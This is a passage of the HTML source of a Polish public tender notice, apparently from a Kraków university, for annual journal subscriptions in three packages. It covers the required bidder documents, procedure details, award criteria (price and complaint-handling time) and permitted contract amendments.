wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne;4) oświadczenie wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r., poz. 716).</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">W ww. zakresie dokumenty nie są wymagane. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">W ww. zakresie dokumenty nie są wymagane. </span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">I. Zamawiający żąda od WSZYSTKICH WYKONAWCÓW złożenia następujących dokumentów:1. Formularz ofertowy (załącznik nr 2 do SIWZ)1) formularz ofertowy należy starannie i czytelnie wypełnić. Zaleca się, aby każdą stronę parafować. Na ostatniej, w miejscu do tego przeznaczonym, należy złożyć podpis, opatrzony datą oraz pieczęcią wykonawcy (zaleca się opatrzyć podpis pieczęcią imienną lub/i pieczęcią z nazwą firmy, jeżeli wykonawca takie posiada).2. Formularz cenowy (załącznik nr 2.1 do SIWZ – dla każdego Pakietu oddzielny)Zapisy dotyczące Pakietu nr I i II:1) formularz cenowy należy starannie i czytelnie wypełnić. Pod tabelą formularza należy złożyć podpis, opatrzony datą oraz pieczęcią wykonawcy (zaleca się opatrzyć podpis pieczęcią imienną lub/i pieczęcią z nazwą firmy, jeżeli wykonawca takie posiada);2) w każdej pozycji formularza cenowego (osobno dla każdego zadania częściowego w Pakiecie I i II) wykonawca wskaże cenę brutto rocznej prenumeraty w złotych, w zapisie liczbowym z dokładnością do dwóch miejsc po przecinku, dla konkretnej pozycji w formularzu cenowym;3) w ostatniej kolumnie, w odniesieniu do każdego zadania częściowego, wykonawca zaoferuje termin rozpatrzenia reklamacji w dniach kalendarzowych, zgodnie z zapisami w SIWZ dotyczącymi tego kryterium; 4) dla każdego zadania częściowego wykonawca wskaże łączną wartość brutto w złotych, w zapisie liczbowym z dokładnością do dwóch miejsc po przecinku;5) wykonawca wskaże ponadto w odniesieniu do każdego zadania częściowego, w Pakiecie I i II, informacje dodatkowe, o których mowa w Rozdziale II SIWZ („Opis przedmiotu zamówienia” – osobno dla każdego Pakietu);6) zamawiający zaleca, aby formularz cenowy złożyć, również w wersji elektronicznej na płytce CD/DVD lub pendrive. Zapisy dotyczące Pakietu nr III:1) formularz cenowy należy starannie i czytelnie wypełnić. Pod tabelą formularza należy złożyć podpis, opatrzony datą oraz pieczęcią wykonawcy (zaleca się opatrzyć podpis pieczęcią imienną lub/i pieczęcią z nazwą firmy, jeżeli wykonawca takie posiada);2) w każdej pozycji formularza cenowego Pakietu III (osobno dla każdego zadania częściowego) wykonawca zobowiązany jest wskazać cenę brutto jednej rocznej prenumeraty poszczególnych tytułów czasopism, w złotych, w zapisie liczbowym z dokładnością do dwóch miejsc po przecinku;3) w każdej pozycji formularza cenowego Pakietu III (osobno dla każdego zadania częściowego) wykonawca zobowiązany jest wskazać wartość brutto poszczególnych zadań za roczną prenumeratę czasopism, w złotych, w zapisie liczbowym z dokładnością do dwóch miejsc po przecinku;4) w ostatniej kolumnie, w odniesieniu do każdego zadania częściowego, wykonawca zaoferuje termin rozpatrzenia reklamacji w dniach kalendarzowych, zgodnie z zapisami w SIWZ dotyczącymi tego kryterium;5) zamawiający zaleca, aby formularz cenowy złożyć, również w wersji elektronicznej na płytce CD/DVD lub pendrive. 3. Wstępne Oświadczenie Wykonawcy (załącznik nr 3 do SIWZ)1) wykonawca składa oświadczenie na wzorze opracowanym przez zamawiającego, stanowiące załącznik nr 3 do SIWZ w celu wstępnej oceny braku podstaw do wykluczenia z postępowania,2) wstępne oświadczenie wykonawcy należy starannie i czytelnie wypełnić. Zaleca się, aby każdą stronę parafować. Na ostatniej, w miejscu do tego przeznaczonym, należy złożyć podpis, opatrzony datą oraz pieczęcią wykonawcy (zaleca się opatrzyć podpis pieczęcią imienną lub/i pieczęcią z nazwą firmy, jeżeli wykonawca takie posiada),3) w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, wstępne oświadczenie, składa każdy z wykonawców wspólnie ubiegających się o zamówienie (art. 25 ust. 6 ustawy Pzp).4. Pełnomocnictwo, jeżeli wykonawcę reprezentuje pełnomocnik. Pełnomocnictwo powinno być złożone w oryginale lub w formie notarialnej kopii poświadczonej za zgodność z oryginałem.II. WSZYSCY WYKONAWCY przekazują zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej.1. W terminie 3 dni od dnia zamieszczenia na stronie internetowej, pod adresem: informacji z otwarcia ofert, wykonawca bez wezwania ze strony zamawiającego składa oświadczenie wykonawcy o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. 2. W przypadku wykonawców wspólnie ubiegających się o zamówienie dokument ten składa każdy z nich. 3. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. 4. Załącznik nr 4 do SIWZ stanowi wzór wymaganego oświadczenia.5. Oświadczenie składa się w oryginale.6. Dla zachowania terminu, zamawiający dopuszcza przesłanie oświadczenia (w formie skanu, w formacie danych: .jpg lub .pdf) drogą elektroniczną na adres: maciej.mlynarczyk@urk.edu.pl lub faksem pod nr: +48 12 662 44 10, ale w takim przypadku wykonawca zobowiązany będzie niezwłocznie do dostarczenia zamawiającemu osobiście, za pośrednictwem posłańca lub operatora pocztowego, oryginału (w formie pisemnej/papierowej) przesłanego wcześniej oświadczenia. </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>CENA</TD><TD style='border: 1px solid black;border-collapse: collapse;'>90,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>TERMIN REKLAMACJI</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający przewiduje zmiany istotnych postanowień umowy w następujących przypadkach:PAKIET I:1.	Zamawiający dopuszcza możliwość zmiany umowy:1)	w zakresie adresu, po który czasopisma mają być dostarczane pod warunkiem, że zmiana obejmować będzie granice administracyjne miasta Krakowa oraz pod warunkiem, że cena nie ulegnie zmianie;2)	w zakresie rezygnacji z prenumeraty danego czasopisma, w przypadku, gdy czasopismo to nie będzie dostępne na rynku z powodu zaprzestania jego wydawania. Wykonawca w takim przypadku wystawi fakturę korygującą i zwróci Zamawiającemu różnicę pomiędzy wynagrodzeniem zapłaconym, a należnym Wykonawcy;3) w zakresie dostawy mniejszej lub większej liczby poszczególnych czasopism, pod warunkiem, że zmiana ta wynikać będzie ze zmniejszenia lub zwiększenia:a)	liczby emisji poszczególnych numerów tytułów zaprenumerowanych czasopism, przez wydawcę, lub ukazania się płatnych dodatków do zaprenumerowanych tytułów. Wykonawca powiadomi pisemnie o tym fakcie jednostkę Zamawiającego, której dotyczy w/w zmiana,b)	zapotrzebowania jednostek Zamawiającego (w tym również rezygnacja z prenumeraty danego czasopisma). Zamawiający powiadomi pisemnie o tym fakcie Wykonawcę.Wykonawca stosownie do zmiany wystawi fakturę korygującą, zwiększającą lub zmniejszającą wartość zamówienia. Strony dokonają stosownej korekty zapłaconego wynagrodzenia. 4)	zmiany ceny czasopisma w przypadku, gdy zmiana ta wynika ze zmiany ceny czasopisma przez wydawcę:a)	zamawiający dopuszcza możliwość zapłaty wyższej ceny za czasopismo, jednakże po wcześniejszym uzgodnieniu zmiany ceny przez Wykonawcę z Zamawiającym,b)	w przypadku obniżenia ceny Wykonawca jest zobowiązany do zwrotu zapłaconego wynagrodzenia (różnicy pomiędzy wynagrodzeniem zapłaconym, a należnym Wykonawcy) W obu w/w przypadkach, rozliczenie nastąpi na podstawie faktury korygującej. 2.	Zamawiający dopuszcza również zmianę umowy, w stosunku do treści złożonej przez Wykonawcę oferty, w zakresie zmiany cen jednostkowych brutto i wynagrodzenia brutto, w przypadku:1)	ustawowej zmiany stawki podatku od towarów i usług;2)	zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r., o minimalnym wynagrodzeniu za pracę;3)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne;4)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych;- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. PAKIET II:1.	Zamawiający dopuszcza możliwość zmiany umowy:1)	w zakresie rezygnacji z prenumeraty danego czasopisma, w przypadku, gdy czasopismo to nie będzie dostępne na rynku z powodu zaprzestania jego wydawania. Wykonawca w takim przypadku wystawi fakturę korygującą i zwróci Zamawiającemu różnicę pomiędzy wynagrodzeniem zapłaconym, a należnym Wykonawcy;2)	zmiany ceny czasopisma w przypadku, gdy zmiana ta wynika ze zmiany ceny czasopisma przez wydawcę:c)	zamawiający dopuszcza możliwość zapłaty wyższej ceny za czasopismo, jednakże po wcześniejszym uzgodnieniu zmiany ceny przez Wykonawcę z Zamawiającym,d)	w przypadku obniżenia ceny Wykonawca jest zobowiązany do zwrotu zapłaconego wynagrodzenia (różnicy pomiędzy wynagrodzeniem zapłaconym, a należnym Wykonawcy) W obu w/w przypadkach, rozliczenie nastąpi na podstawie faktury korygującej. 2.	Zamawiający dopuszcza również zmianę umowy, w stosunku do treści złożonej przez Wykonawcę oferty, w zakresie zmiany cen jednostkowych brutto i wynagrodzenia brutto, w przypadku:1)	ustawowej zmiany stawki podatku od towarów i usług;2)	zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r., o minimalnym wynagrodzeniu za pracę;3)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne;4)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych;- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. PAKIET III:1.	Zamawiający dopuszcza możliwość zmiany umowy:1)	w zakresie adresu, po który czasopisma mają być dostarczane pod warunkiem, że zmiana obejmować będzie granice administracyjne miasta Krakowa oraz pod warunkiem, że cena nie ulegnie zmianie;2)	w zakresie rezygnacji z prenumeraty danego czasopisma, w przypadku, gdy czasopismo to nie będzie dostępne na rynku z powodu zaprzestania jego wydawania. Wykonawca w takim przypadku wystawi fakturę korygującą i zwróci Zamawiającemu różnicę pomiędzy wynagrodzeniem zapłaconym, a należnym Wykonawcy;3) w zakresie dostawy mniejszej lub większej liczby poszczególnych czasopism, pod warunkiem, że zmiana ta wynikać będzie ze zmniejszenia lub zwiększenia:c)	liczby emisji poszczególnych numerów tytułów zaprenumerowanych czasopism, przez wydawcę, lub ukazania się płatnych dodatków do zaprenumerowanych tytułów. Wykonawca powiadomi pisemnie o tym fakcie jednostkę Zamawiającego, której dotyczy w/w zmiana,d)	zapotrzebowania jednostek Zamawiającego (w tym również rezygnacja z prenumeraty danego czasopisma). Zamawiający powiadomi pisemnie o tym fakcie Wykonawcę.Wykonawca stosownie do zmiany wystawi fakturę korygującą, zwiększającą lub zmniejszającą wartość zamówienia. Strony dokonają stosownej korekty zapłaconego wynagrodzenia.4)	zmiany ceny czasopisma w przypadku, gdy zmiana ta wynika ze zmiany ceny czasopisma przez wydawcę:e)	zamawiający dopuszcza możliwość zapłaty wyższej ceny za czasopismo, jednakże po wcześniejszym uzgodnieniu zmiany ceny przez Wykonawcę z Zamawiającym,f)	w przypadku obniżenia ceny Wykonawca jest zobowiązany do zwrotu zapłaconego wynagrodzenia (różnicy pomiędzy wynagrodzeniem zapłaconym, a należnym Wykonawcy) W obu w/w przypadkach, rozliczenie nastąpi na podstawie faktury korygującej. 2.	Zamawiający dopuszcza również zmianę umowy, w stosunku do treści złożonej przez Wykonawcę oferty, w zakresie zmiany cen jednostkowych brutto i wynagrodzenia brutto, w przypadku:1)	ustawowej zmiany stawki podatku od towarów i usług;2)	zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r., o minimalnym wynagrodzeniu za pracę;3)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne;4)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych;- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-11-27</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski </span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">UWAGA! Niniejsze postępowanie zostało podzielone na 3 Pakiety, które z kolei podzielone zostały na poszczególne zadania częściowe:1. 